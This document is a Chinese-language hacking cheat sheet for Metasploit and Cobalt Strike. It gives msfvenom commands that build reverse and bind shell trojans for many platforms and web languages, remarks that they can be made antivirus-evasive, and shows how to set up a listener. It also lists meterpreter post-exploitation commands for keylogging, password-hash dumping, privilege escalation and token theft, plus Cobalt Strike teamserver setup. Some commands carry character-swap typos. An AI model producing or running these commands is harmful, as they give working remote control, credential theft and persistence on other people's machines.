KALI系统
MSF
上线前
1.生成木马
msfvenom -p linux/x86/meterpreter/bind_tcp LHOST=192.168.43.3 LPORT=3333 -f elf > shell.elf
msfvenom -p linux/x86/meterpreter/bind_tcp -f elf > Jarun.elf
反向连接 reverse 正向连接 bind
反向连接 (靶机运行木马 靶机一直访问攻击机=>是否有命令需要执行)
正向连接 (攻击机访问靶机-端口 靶机运行木马则会打开该端口 )
系统木马
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.43.3 LPORT=3333 -f elf > shell.elf
windows -f exe 可以根据所需修改为 -f c /-f php 代码可以做免杀
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.3 LPORT=3333 -f exe > shell.exe
Mac:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address>LPORT=<Your Port to Connect On> -f macho shell.macho
Android:
msfvenom-p android/meterpreter/reverse_tcp LHOST=[你的IP] LPORT[端口] -o 保存路径/文件名.apk
名.apk
可做免杀
编程语言=>浏览器运行
PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address>LPORT=<Your Port to Connect on>-f raw shell.php
cat shell.php | pbcopy && echo '<?php ' tr -d '\n' >shell.php &&pbpaste >> shell.php
ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect on > -f asp>shell.asp
JSP:
msfvenom-p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect on>-f raw > shell.jsp
WAR: =>tomcat组件 上传
msfvenom -p java/jsp_shel1_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect on> -f war>shell.war
Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect on>-f raw> shell.py
命令行木马
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect on>-f raw>shell.sh
Perl:
msfvenom -p cmd/unix/reverse_per1 LHOST=<Your IP Address> LPORT=<Your Port to Connect on>-f raw>shell.pl
2.生成监听器
设置的参数与上面生成的木马一致
netstat -ntlp
1 use exploit/multi/handler //监听端口模块
2 set PAYLOAD windows/meterpreter/reverse_tcp //木马类型
3 set LHOST 0.0.0.0
4 set LPORT 8001
5 run
background=>放在后台
sessions 后台进程3.search命令 漏洞使用
search 漏洞名CVE-2022-0847 脏管 提权
上线中
msf常用操作
background返回后台
exit关闭会话
he1p帮助信息
Sysinfo系统平台信息*
screenshot屏幕截取
she11 命令行she11(exit退出)*
getlwd查看本地目录
1cd切换本地目录
getwd查看日录
1s查看文件目录列表
cd切换日录
rm删除文件
down1oad C:\Users\123\Desktop\1.txt 1.txt下载文件*
upload /var/w/wce.exe wce.exe上传文件 (攻击者上传文件 被攻击者路径)*
search -d c:-f*.doc搜索文件*
execute -f cmd.exe -i执行程序/命令*
ps查看进程*
run post ./windows/capture/keylog._recorder键盘记录
getuid查看当前用户权限*
use priv加载特权模块*
getsystem 提升到SYSTEM权限*
hashdump导出密码散列
ps查看高权限用户PID
steal_token <PID>窃取令牌
rev2se1f 恢复原来的令牌cobakt strike(cs)
服务端 centos7
上传相同文件 需要java环境 需要关闭防火墙 皆
1.开权限
sudo chmod 777 teamserver
2.启动./teamserver<IP><密码>
3.修改默认端口 teamserver文件
只需要修改最后一行的-Dcobaltstrike.server_port,
可以是80,443,3389,8080等常见端口,前提是该端口没有被使用
客户端 windows 10
点击开启
输入服务端的ip 以及密码use exploit/multi/handler set payload windows/meterpreter/bind_tcp set rhost 192.168.3.32
set lport 8933 run